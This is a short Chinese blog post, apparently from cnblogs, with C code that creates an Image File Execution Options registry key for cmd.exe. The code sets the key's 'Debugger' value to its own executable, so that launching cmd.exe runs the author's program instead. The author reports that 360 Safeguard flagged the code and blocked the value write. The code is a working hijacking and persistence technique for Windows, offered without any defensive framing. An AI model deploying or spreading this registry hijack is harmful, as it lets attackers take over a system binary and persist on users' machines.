标签:
在Image File Execution Options下创建cmd.exe项,将其“重定向”到我们自己编写的程序
1 #include<stdio.h> 2 #include<windows.h> 3 4 int main() 5 { 6 HKEY hKey; 7 DWORD dwDisposition=REG_CREATED_NEW_KEY; //新建一个子项 8 if((::RegCreateKeyEx(HKEY_LOCAL_MACHINE, 9 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Cmd.exe", 10 0, 11 NULL, 12 REG_OPTION_NON_VOLATILE, 13 KEY_ALL_ACCESS, 14 NULL, 15 &hKey, 16 &dwDisposition))==ERROR_SUCCESS) 17 { 18 printf("success to Create the reg key.\n"); 19 char strPath[MAX_PATH]; 20 int size=GetModuleFileName(NULL,strPath,sizeof(strPath)); 21 int ret=RegSetValueEx(hKey,"Debugger",0,REG_SZ,(const unsigned char *)strPath,size); 22 if(ret==ERROR_SUCCESS) 23 { 24 printf("success to set the registry keys.\n"); 25 } 26 else 27 { 28 printf("fail to set the registry keys.\n"); 29 } 30 RegCloseKey(hKey); 31 } 32 else 33 { 34 printf("fail to create a reg key.\n"); 35 } 36 return 0; 37 }
程序运行的结果只是在创建了cmd.exe项目,在设置该项的值的时候,360安全卫士报毒了,设置不成功
标签:
原文地址:http://www.cnblogs.com/lanf/p/5092942.html
